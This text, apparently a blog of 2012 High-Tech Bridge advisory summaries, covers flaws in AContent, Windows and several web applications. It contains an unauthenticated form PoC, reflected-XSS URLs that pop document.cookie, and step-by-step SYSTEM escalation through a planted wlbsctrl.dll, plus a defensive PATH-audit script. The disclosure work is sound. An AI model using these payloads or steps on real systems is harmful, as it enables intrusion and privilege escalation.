2.2 The vulnerability exists due to absent authentication in the "/course_category/index_inline_editor_submit.php" script. A remote unauthenticated attacker can modify the names of existing categories.

The following example will change the name of the category with id=1 to 'new_category':

<form action="http://[host]/course_category/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="category_name-1" />
<input type="hidden" name="value" value="new_category" />
<input type="submit" id="btn">
</form>

3) Cross-Site Scripting (XSS) in AContent: CVE-2012-5169

Input passed via the HTTP GET parameters "pathext", "popup", "framed" and "file" to /file_manager/preview_top.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected website.

The following PoCs (Proof of Concept) demonstrate the vulnerabilities:

http://[host]/file_manager/preview_top.php?pathext=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?popup=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?framed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/file_manager/preview_top.php?file=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

-----------------------------------------------------------------------------------------------

Solution:

Users should apply patches #1 and #2 using the AContent Administrator's Updater tool.

More Information:
http://update.atutor.ca/acontent/patch/1_2/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23117 - https://www.htbridge.com/advisory/HTB23117 - Multiple vulnerabilities in AContent.
[2] AContent - http://atutor.ca - AContent is an open source learning content authoring system and repository used to create interoperable, accessible, adaptive Web-based learning content.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

HTB23113: Subrion CMS multiple vulnerabilities

Subrion CMS

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Subrion CMS version 2.2.1 which can be exploited to perform Cross-Site Scripting (XSS), SQL Injection and Cross-Site Request Forgery (CSRF) attacks.

  • SQL Injection in Subrion CMS:
    Input passed via the "plan_id" POST parameter to the "/register/" URL (rewritten by mod_rewrite to the "system.php" script) is not properly sanitised before being used in a SQL query.

  • Cross-Site Scripting (XSS) in Subrion CMS:
    Input passed via the "f[accounts][fullname]" and "f[accounts][username]" GET parameters to the "/advsearch/" URL (rewritten by mod_rewrite to the "system.php" script), and via the "id" and "group" GET parameters to multiple files, is not properly sanitised before being returned to the user.

  • Cross-Site Request Forgery (CSRF) in Subrion CMS:
    It is possible to create an administrative account within the application.

Proof of concept (PoC) examples are available on the original advisory page: HTB23113 - Multiple vulnerabilities in Subrion CMS.

HTB23107: jCore multiple vulnerabilities

jCore

jCore, a free and open source content management system (CMS), version 1.0pre, suffers from SQL injection and XSS vulnerabilities.

The vulnerabilities were discovered by High-Tech Bridge Security Research Lab and published on the advisory page:

High-Tech Bridge Advisory HTB23107 - Multiple vulnerabilities in jCore.

SQL injection: input passed via the "memberloginid" COOKIE parameter to "admin/index.php" is not properly sanitised before being used in a SQL query.

XSS: input passed via the "path" GET parameter to /admin/index.php is not properly sanitised before being returned to the user.

Solution: upgrade to the latest release.

HTB23099: Samsung Kies multiple vulnerabilities

Multiple vulnerabilities in Samsung Kies version 2.3.2.12054_20 and probably prior have been discovered by High-Tech Bridge Security Research Lab. They allow a remote attacker to compromise the affected system, execute and modify arbitrary files, modify arbitrary directories and modify the System Registry with the privileges of the current user. Vulnerability types in HTB23099: NULL pointer dereference and improper access control.

  • Null Pointer Dereference in Samsung Kies:
    The vulnerability exists due to a null pointer dereference error in GetDataTable() method within the Samsung.DeviceService.DCA.DeviceDataParagonATGM.1 ActiveX control.

  • Arbitrary File Execution in Samsung Kies:
    The CmdAgent.dll library has numerous arbitrary file modification vulnerabilities present in "CmdAgentLib", in particular in the 'ICommandAgent' interface of the "CommandAgent" class. This default "ICommandAgent" interface has multiple functions and methods, and most of them can be invoked by an untrusted source.

  • Arbitrary Directory Modification in Samsung Kies:
    The CmdAgent.dll library has numerous arbitrary directory modification vulnerabilities present in "CmdAgentLib", in particular in the 'ICommandAgent' interface of the "CommandAgent" class. This default "ICommandAgent" interface has multiple functions and methods, and most of them can be invoked by an untrusted source.

  • Arbitrary Registry Modification in Samsung Kies:
    The CmdAgent.dll library has numerous Registry modification vulnerabilities present in "CmdAgentLib", in particular in the 'ICommandAgent' interface of the "CommandAgent" class. This default "ICommandAgent" interface has multiple functions and methods, and most of them can be invoked by an untrusted source.

PoC examples, additional details and how-to-fix information are available on the researcher's page.

Friday, October 12, 2012

CVE-2012-1535: Adobe Flash Player integer overflow vulnerability analysis

Brian Mariani and Frederic Bourla from High-Tech Bridge have published the whitepaper "CVE-2012-1535: Adobe Flash Player Integer Overflow Vulnerability Analysis". The publication explains the particulars of the CVE-2012-1535 security vulnerability in detail.

You can download PDF here: CVE-2012-1535: Adobe Flash Player Integer Overflow Vulnerability Analysis.

HTB23116: OpenX cross-site scripting & SQL injection vulnerabilities

OpenX

Multiple vulnerabilities in OpenX were discovered by High-Tech Bridge Security Research Lab three weeks ago and disclosed this week.

  • Cross-Site Scripting (XSS) in OpenX: Input passed via the "parent" GET parameter to "www/admin/plugin-index.php" is not properly sanitised before being returned to the user.

  • SQL Injection in OpenX: Input passed via the "ids[]" POST parameter to "www/admin/campaign-zone-link.php" is not properly sanitised before being used in a SQL query.

To fix these issues, replace the files from the SVN repository as described in High-Tech Bridge security advisory HTB23116: Multiple vulnerabilities in OpenX. PoC examples are also available on the researcher's page.

Thursday, October 11, 2012

How to Secure Your Digital Assets in the Era of Cyber War (October, 16)

High-Tech Bridge Annual Conference

Date: 16 October 2012
Venue: Crowne Plaza Hotel, Geneva, Switzerland

Businesses of all sizes are embracing new approaches to IT (such as cloud computing, virtualisation, BYOD and BPO), making them more and more dependent upon their IT infrastructure. This dynamic IT environment stimulates hackers, and organisations face increasingly targeted and sophisticated attacks. The attackers range from individual "hacktivists" to organised crime rings and totalitarian nation-states. Many hackers are highly organised and skilled.

Despite the prevalence of firewalls, IDS/IPS, encryption and other security measures, many organisations continue to fall victim to hacking attacks due to configuration errors or inadequate security solutions. As a result, companies are beginning to recognise the importance of regular security audits, because human experience and analysis are essential to the maintenance of a strong network security perimeter.

To raise awareness of the threat facing all types of organisations, High-Tech Bridge organises its annual conference entitled "How to Secure Your Digital Assets in the Era of Cyber War". The conference will take place on Tuesday, 16 October 2012, at Crowne Plaza Hotel, Geneva.

Frost & Sullivan Principal Alexander Michael will be speaking at the conference with the following presentation: "Ethical Hacking: Why it is a Business Investment, not a Cost".

For additional information about the event, please follow the link: https://www.htbridge.com/events/high_tech_bridge_annual_conference_2012.html

If you would like to obtain Mr Michael's presentation or receive Frost & Sullivan's two recent security whitepapers, please contact Joanna Lewandowska, Corporate Communications, at joanna.lewandowska (at) frost.com.

Source: How to Secure Your Digital Assets in the Era of Cyber War (frost.com)

HTB23108: Privilege escalation vulnerability in Microsoft Windows

This Tuesday, October 9, High-Tech Bridge disclosed the details of security advisory HTB23108: Privilege escalation vulnerability in Microsoft Windows.

Vendor: Microsoft Corporation
Vulnerable Versions: Windows Vista, Windows Server 2008, Windows 7, Windows 8 RP
Tested Version: Windows Vista Ultimate SP1, Windows 2008 SP2, Windows 7 Professional SP1, Windows 8 RP
Vulnerability Type: Uncontrolled Search Path Element [CWE-427]
CVE Reference: Pending
CVSSv2 Base Score: 6 (AV:L/AC:H/Au:S/C:C/I:C/A:C)
Risk Level: Medium

Description

High-Tech Bridge Security Research Lab has discovered a vulnerability in Microsoft Windows which could be exploited to escalate privileges under certain conditions.

The vulnerability exists because the "IKE and AuthIP IPsec Keying Modules" system service tries to load the "wlbsctrl.dll" DLL, a library that is not present after a default Windows installation.

The "IKE and AuthIP IPsec Keying Modules" service starts automatically in default configuration (after default installation) of:

  • Microsoft Windows Vista
  • Microsoft Windows 2008
  • Microsoft Windows 7
  • Microsoft Windows 8 Release Preview

Moreover, the service runs with SYSTEM privileges by default. Therefore an unprivileged local user who has write access to any default or other search PATH location can execute arbitrary code on the vulnerable system with the privileges of the SYSTEM account.

Vulnerability Details

The "IKE and AuthIP IPsec Keying Modules" service tries to load the "wlbsctrl.dll" library, which is missing. This forces Microsoft Windows to use its search PATH procedure to locate the missing dynamic-link library, in the following order as described by Microsoft:

  • The directory from which the application loaded
  • The system directory
  • The 16-bit system directory
  • The Windows directory
  • The current directory
  • The directories that are listed in the PATH environment variable

When a directory is created in the C:\ root folder, access permissions for files and subfolders are inherited from the parent directory. By default, members of the Authenticated Users group have FILE_APPEND_DATA and FILE_WRITE_DATA rights on all directories created within the C:\ root folder. This also applies to folders created by an application's installer. The vulnerability is introduced to the system when software does not change the default permissions of its installation directory and adds its installation path to the PATH system environment variable. Any member of the Authenticated Users group can then place a malicious file named "wlbsctrl.dll" into that folder and execute arbitrary code on the system after a simple reboot.

Brief research confirmed that the following well-known software makes the weakness exploitable when installed into the C:\ root folder:

- ActivePerl 5.16.1.1601 (default installation): CVE-2012-5377
Adds to the PATH variable: C:\Perl\Site\bin;

- ActiveTcl 8.5.12 (default installation): CVE-2012-5378
Adds to the PATH variable: C:\TD\bin

- ActivePython 3.2.2.3 (option to modify the PATH variable is inactive, but can be manually activated): CVE-2012-5379
Adds to the PATH variable: C:\Python27\;C:\Python27\Scripts;

- Ruby installer 1.9.3-p194 (option to modify the PATH variable is inactive, but can be manually activated): CVE-2012-5380
Adds to the PATH variable: C:\Ruby193\bin;

- PHP 5.3.17 (option to modify the PATH variable is inactive, but can be manually activated; must be explicitly configured to be installed into C root folder, e.g. C:\PHP): CVE-2012-5381
Adds to the PATH variable: C:\PHP\;

- Zend Server 5.6.0 SP4 (must be explicitly configured to be installed into C root folder, e.g. C:\Zend): CVE-2012-5382
Adds to the PATH variable: C:\Zend\ZendServer\share\ZendFramework\bin

- MySQL 5.5.28 (option to modify the PATH variable is inactive, but can be manually activated; must be explicitly configured to be installed into C root folder, e.g. C:\MySQL): CVE-2012-5383
Adds to the PATH variable: C:\MySQL\MySQL Server 5.5\bin

Attack vectors

Any member of the Authenticated Users group can escalate their privileges to SYSTEM when the following conditions are met:

  1. The above-mentioned software sets insecure permissions on its installation folder (it is writable by members of the Authenticated Users group).
  2. The above-mentioned software adds its installation path to the system PATH environment variable.
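
As an added, defender-side check (example code written for this page, not part of the advisory or of Microsoft's guidance), the following PowerShell audits the machine-scope PATH for exactly these two conditions: a PATH directory on which broad groups hold write or append rights, and a file with the probed name already sitting there. The DLL name and the Authenticated Users group come from the advisory; the other group names, the function names and the use of the machine-scope PATH are assumptions.

```powershell
# Added example, not part of advisory HTB23108.
# Audits every directory on the machine PATH for (1) write/append rights held by
# broad groups and (2) an already-present wlbsctrl.dll (which the advisory says is
# absent after a default installation, so its presence on PATH is suspicious).
# Assumptions: English well-known group names; an ordinary (non-admin) user may run it.

$ProbedDll   = 'wlbsctrl.dll'
$BroadGroups = @('NT AUTHORITY\Authenticated Users', 'BUILTIN\Users', 'Everyone')

# FILE_WRITE_DATA (CreateFiles) and FILE_APPEND_DATA (CreateDirectories) are the
# rights the advisory describes. Modify, Write and FullControl contain these bits,
# so a bitwise test also catches the broader grants.
$WriteBits = [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
             [System.Security.AccessControl.FileSystemRights]::CreateDirectories

function Get-MachinePathDirectories {
    # Machine-scope PATH is what a SYSTEM service inherits; expand %VARS% and drop
    # empty entries left by trailing semicolons (e.g. "C:\Perl\Site\bin;").
    $raw = [Environment]::GetEnvironmentVariable('Path', 'Machine')
    $raw -split ';' |
        ForEach-Object { [Environment]::ExpandEnvironmentVariables($_.Trim()) } |
        Where-Object { $_ -ne '' } |
        Select-Object -Unique
}

function Test-BroadWriteAccess {
    # Returns the first Allow ACE granting write/append bits to a broad group on
    # the directory itself, or $null. Inherit-only ACEs do not apply to the folder.
    param([Parameter(Mandatory)][string]$Directory)
    try { $acl = Get-Acl -LiteralPath $Directory -ErrorAction Stop } catch { return $null }
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($BroadGroups -notcontains $rule.IdentityReference.Value) { continue }
        $inheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly
        if (($rule.PropagationFlags -band $inheritOnly) -ne 0) { continue }
        if (([int]$rule.FileSystemRights -band [int]$WriteBits) -ne 0) {
            return [pscustomobject]@{
                Identity = $rule.IdentityReference.Value
                Rights   = $rule.FileSystemRights
            }
        }
    }
    return $null
}

$findings = foreach ($dir in Get-MachinePathDirectories) {
    if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
    $hit     = Test-BroadWriteAccess -Directory $dir
    $planted = Test-Path -LiteralPath (Join-Path $dir $ProbedDll) -PathType Leaf
    if ($hit -or $planted) {
        $who    = if ($hit) { $hit.Identity } else { '' }
        $rights = if ($hit) { $hit.Rights }   else { '' }
        [pscustomobject]@{
            Directory  = $dir
            WritableBy = $who
            Rights     = $rights
            DllPresent = $planted
        }
    }
}

if ($findings) {
    $findings | Format-Table -AutoSize
} else {
    'No PATH directory is writable by broad groups and no wlbsctrl.dll was found on PATH.'
}
```

Each finding maps directly to the MSRC mitigation quoted later in this advisory: either remove the directory from the machine PATH or restrict the ACL of the application directory so that Authenticated Users can no longer create files in it.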

Proof of Concept

You can download the PoC (Proof of Concept) that demonstrates exploitation of the vulnerability under a non-privileged user account on a default installation of Windows 7 with a default installation of the latest version of ActivePerl.

How to exploit:

  1. Log in under an unprivileged system account.
  2. Download and extract the HTB23108-P0c-Windows-Services.rar archive.
  3. Copy the files from the archive into the C:\Perl\site\bin folder.
  4. Reboot the system.
  5. Log in under unprivileged system account.
  6. Run the C:\Perl\site\bin\ADMC.exe file.
  7. Enter the following credentials when asked:
    Login: fox
    Password: 1234

  8. Type "shell" and then the "whoami" command in the system console; you will see "nt authority\system", meaning you have an administrative console.

Conclusion

Many Windows services have missing DLLs, and the search PATH procedure is a built-in Windows feature. However, in this case the service with the missing DLL runs by default with SYSTEM privileges. Combined with some well-known software in its default installation, this "feature" becomes a perfectly exploitable vulnerability under a relatively widespread Windows configuration.

Solution:

Official MSRC answer:
Microsoft has thoroughly investigated the claim and found that this is not a product vulnerability. In the scenario in question, the default security configuration of the system has been weakened by a third-party application. Customers who are concerned with this situation can remove the directory in question from PATH or restrict access to the third-party’s application directory to better protect themselves against these scenarios.

Microsoft requested and validated disclosure of the advisory on the 9th of October 2012.

Please refer to our Disclosure Policy if you have any questions.

References:

[1] High-Tech Bridge Advisory HTB23108 - https://www.htbridge.com/advisory/HTB23108 - Privilege Escalation Vulnerability in Microsoft Windows
[2] Microsoft Windows - http://www.microsoft.com - Microsoft Windows is a series of graphical interface operating systems developed, marketed, and sold by Microsoft.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Monday, October 8, 2012

HTB23115: Template CMS multiple vulnerabilities

Template CMS version 2.1.1 suffers from XSS and CSRF vulnerabilities.

Template CMS

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Template CMS, which can be exploited to perform cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks.

  • CWE-79: cross-site scripting in Template CMS:
    Input passed via the "themes_editor" POST parameter to "admin/index.php" is not properly sanitised before being returned to the user (CVE-2012-4901).
    CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)

  • CWE-352: cross-site request forgery
    Template CMS v.2.1.1 allows an authorized administrator to perform certain actions via HTTP requests without proper validity checks to verify the source of the requests (CVE-2012-4902).
    CVSSv2 Base Score: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)

Friday, September 28, 2012

4 out of 5 websites are vulnerable

Four out of Five Sites are Vulnerable, says Herald Online in an article about Web Application Security.

Frost & Sullivan's recent White Paper (WP) discusses the growing threat to web applications, putting it into its proper business context. Describing the mysterious world of web application hacking, the paper also gives an overview of the likely victims and outlines the solutions available to organisations to protect themselves. The paper benefits from the insight and experience of leading security companies and organizations, such as MITRE, High-Tech Bridge, and the Online Trust Alliance (OTA), who provided excellent support to Frost & Sullivan during the WP review.

Read more here: http://www.heraldonline.com/2012/09/05/4236143/web-application-security-is-an.html

Thursday, September 13, 2012

HTB23111: TCExam 11.3.008 multiple vulnerabilities

TCExam

TCExam version 11.3.008 suffers from SQL injection and cross-site scripting (XSS) vulnerabilities. Details of the issues were published by High-Tech Bridge Security Research Lab and are available to the public on their advisory page: TCExam multiple vulnerabilities.

  1. SQL injection: Input passed via the "user_groups[]" POST parameter to "admin/code/tce_edit_test.php", and via the "subject_id" POST parameter to "/admin/code/tce_show_all_questions.php", is not properly sanitised before being used in a SQL query.
  2. Cross-site scripting (XSS): Input passed via the "cid" and "uids" GET parameters to "admin/code/tce_select_users_popup.php" script is not properly sanitised before being returned to the user.

Vulnerability ID: HTB23111
Vendor Notification / Patch / Public Disclosure Dates: August 22 / August 22 / September 12, 2012
Vulnerabilities Type: SQL Injection, XSS
Risk level: Medium
Solution Status: Fixed by Vendor, upgrade to TCExam 11.3.009

TCExam is a web-based CBA - Computer-Based Assessment system (e-exam, CBT - Computer Based Testing) for universities, schools and companies, that enables educators and trainers to author, schedule, deliver, and report on surveys, quizzes, tests and exams.

Friday, September 7, 2012

How to use PyDbg as a powerful multitasking debugger

Brian Mariani & Frederic Bourla from High-Tech Bridge have published an interesting whitepaper, "How to use PyDbg as a powerful multitasking debugger". The aim of the publication is to give the reader an introduction to the Python-based debugger and to deliver practical, real examples of how this powerful security tool is used.

Excerpt from the article (page 2):

The debugger’s goal

  • When a program crashes for some reason it is often hard to realize what happened without using the appropriate tool.
  • A debugging tool is a program which aims to analyze other programs.
  • The main interest when using a debugger is to analyze the code behavior or to find a bug in another program.
  • A debugger allows a programmer or a researcher to quickly identify the cause of a problem in the code.

You can view this publication on SlideShare.

Thursday, September 6, 2012

HTB23095: Kayako Fusion 4.40.1148 cross-site scripting (XSS) vulnerability

Kayako Fusion

Kayako Fusion version 4.40.1148 and probably prior suffers from a cross-site scripting (XSS) vulnerability (CVE-2012-3233).

This XSS vulnerability can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected website: input appended to the URL after "/__swift/thirdparty/PHPExcel/PHPExcel/Shared/JAMA/docs/download.php" is not properly sanitised before being returned to the user.

Vulnerability ID: HTB23095
Vendor Notification / Public Disclosure Dates: June 6 / September 5, 2012
Vulnerability Type: Cross-Site Scripting [CWE-79]
Risk level: Medium [CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)]
Solution Status: Fixed by Vendor, upgrade to Kayako Fusion 4.50.1581

Kayako Fusion is the world's leading multi-channel helpdesk solution that enables organizations to deliver a better customer experience and work more effectively as a team, whatever their size.

See details and the PoC example for this advisory: Cross-Site Scripting (XSS) in Kayako Fusion.

HTB23110: Flogr 2.5.6 cross-site scripting (XSS) vulnerabilities

Flogr

Flogr version 2.5.6 and probably prior suffers from a cross-site scripting (XSS) vulnerability (CVE-2012-4336).

Input appended to the URL after "index.php", and input passed via arbitrary GET parameters to "index.php", is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected website.

Vulnerability ID: HTB23110
Vendor Notification / Public Disclosure Dates: August 15 / September 5, 2012
Vulnerability Type: Cross-Site Scripting [CWE-79]
Risk level: Medium [CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)]
More information is available on the advisory page.

HTB23088: TestLink cross-site request forgery (CSRF)

TestLink

TestLink version 1.9.3 and probably prior suffers from a cross-site request forgery (CSRF) vulnerability (CVE-2012-2275).

The source of the requests does not have proper validity checks; this can be exploited to perform certain actions via HTTP requests by authorized users. In the original security advisory we can see a PoC for the "lib/usermanagement/userInfo.php" script that changes the administrator's email.

Vulnerability ID: HTB23088
Vendor Notification: April 18, 2012
Public Disclosure: September 5, 2012
Vulnerability Type: XSRF/CSRF
Risk level: Medium [CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)]
Solution Status: Fixed by Vendor, upgrade to TestLink 1.9.4

See details and PoC examples for this advisory: Cross-Site Request Forgery (CSRF) in TestLink.

Friday, August 31, 2012

High-Tech Bridge office photos

High-Tech Bridge slightly lifted the veil of secrecy, and now we can see photos of the new company office.

You can also find other photos of High-Tech Bridge's office. High-Tech Bridge is located in World Trade Center II, Geneva.

High-Tech Bridge Security Research Lab obtains "CWE-Compatible" status

High-Tech Bridge is pleased to announce that Security Advisories by High-Tech Bridge Security Research Lab have achieved the final stage of MITRE's formal CWE Compatibility Process and now have "Officially CWE-Compatible" status.

High-Tech Bridge security advisories are now one of 17 CWE-Compatible information security products and services.

The Common Weakness Enumeration (CWE™) is a list of software weaknesses that aims to provide a classification mechanism for vulnerabilities. Creating the list is a community initiative: the participating organizations, and any others that wish to join the effort, are creating specific and succinct definitions for each of the elements in the CWE List. Read more about CWE here.

Certificate of CWE Compatibility: High-Tech Bridge SA's High-Tech Bridge Security Advisories are CWE Compatible.

Also, Security Advisories by High-Tech Bridge Research Lab recently obtained "CVE-Compatible" status, so High-Tech Bridge advisories are now both CVE- and CWE-compatible.

Thursday, August 30, 2012

HTB23109: XSS in Phorum 5.2.18

This week, details of a cross-site scripting (XSS) vulnerability (CVE-2012-4234, HTB23109) in Phorum version 5.2.18 were disclosed by High-Tech Bridge Security Advisories.

Vulnerability details: input passed via the "group" GET parameter to the "control.php" script is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected website.

Phorum is open source PHP forum software with a penchant for speed. Phorum's very flexible hook and module system can satisfy every web master's needs.

Last Friday, Phorum 5.2.19 was released, which contains a security fix for this vulnerability. Details are available on the vendor's website.

HTB23091: PrestaShop 1.4.7-1.4.8 cross-site scripting vulnerabilities

PrestaShop versions 1.4.7, 1.4.8 and probably prior are vulnerable to cross-site scripting attacks. Information about this vulnerability was published recently (HTB23091) by High-Tech Bridge Security Research Lab.

The Cross-Site Scripting (XSS) vulnerability in PrestaShop (CVE-2012-2517) existed because input passed via the "product" POST parameter to the "ajax.php" script was not properly sanitised before being returned to the user. According to the Security Glossary, XSS (Cross Site Scripting) is a web application vulnerability that allows an attacker to inject arbitrary HTML or scripting code into the web page content.

PrestaShop is the most reliable and flexible Free Open-source e-commerce software. Since 2007, PrestaShop has revolutionized the industry by providing features that engage shoppers and increase online sales.

The vulnerability is now fixed; all users should update their installations to PrestaShop v1.4.9.

On High-Tech Bridge's Facebook page we can see that the article "XSS & CSRF: Exploitation pratique des vulnérabilités" was published by Hakin9 Magazine. I wish you pleasant reading.

Thursday, August 16, 2012

HTB23104: Cross-site scripting (XSS) vulnerability in Jease

Jease CMS

A vulnerability in Jease version 2.8 (and probably prior) has been discovered which can be exploited to perform cross-site scripting (XSS) attacks. Advisory details were published on the High-Tech Bridge Security Advisories page.

The cross-site scripting (XSS) vulnerability in Jease (CVE-2012-4052) existed because input passed via the "author", "subject" and "comment" POST parameters when creating a new comment was not properly sanitised before being returned to the user. According to Wikipedia, cross-site scripting (XSS) is a type of computer security vulnerability that enables attackers to inject client-side script into Web pages viewed by other users.

Jease Content Management System is an Open Source CMS which is driven by the power of Java. Jease means "Java with Ease", so Jease promises to keep simple things simple and the hard things (j)easy.

The vulnerability now has status "Fixed"; you should upgrade your Jease installation to version 2.9.

On High-Tech Bridge's Twitter feed we can also see that another advisory, about Flogr, was published this week. Details will be published later.

Friday, August 10, 2012

HTB23101: PBBoard 2.1.4 multiple vulnerabilities

PBBoard Community Forum

PBBoard Community Forum version 2.1.4 suffers from SQL injection, improper authentication and improper access control vulnerabilities.

  1. SQL injection: Input passed via the "username", "email", "password", "section", "section_id", "member_id", "subjectid" POST parameters to "index.php" script is not properly sanitised before being used in a SQL query.
  2. Improper Authentication: PBBoard permits to change password of any board member due to absence of any verification of user-supplied "member_id" POST parameter in the password change script.
  3. Improper Access Control: Input passed via the "xml_name" POST parameter to "admin.php" is not properly sanitised before being used as a name of a newly created file.

Vulnerability ID: HTB23101
Vendor Notification / Patch / Public Disclosure Dates: July 18 / August 6 / August 8, 2012
Vulnerabilities Type: SQL injection, improper authentication, improper access control
Risk level: Medium
Solution Status: Fixed by Vendor, Apply 5-8-2012 Security Patch (http://www.pbboard.com/forums/index.php?page=download&attach=1&id=4984)

You can find the full text with additional conditions and PoC examples on the HTB advisory page: PBBoard multiple vulnerabilities.

HTB23100: phpList 2.10.18 cross-site scripting and SQL injection vulnerabilities

phpList

phpList version 2.10.18 suffers from SQL injection and cross-site scripting (XSS) vulnerabilities.

  1. SQL injection: Input passed via the "delete" GET parameter to the "admin/index.php" script (when "page" is set to "editattributes") is not properly sanitised before being used in a SQL query.
  2. Cross-site scripting (XSS): Input passed via the "unconfirmed" GET parameter to "admin/index.php" script (when "page" is set to "user") is not properly sanitised before being returned to the user.

Vulnerability ID: HTB23100
Vendor Notification / Patch / Public Disclosure Dates: July 11 / August 2 / August 8, 2012
Vulnerabilities Type: XSS, SQL Injection
Risk level: Medium
Solution Status: Fixed by Vendor, upgrade to phpList 2.10.19

See details and PoC examples for this advisory: phpList multiple vulnerabilities.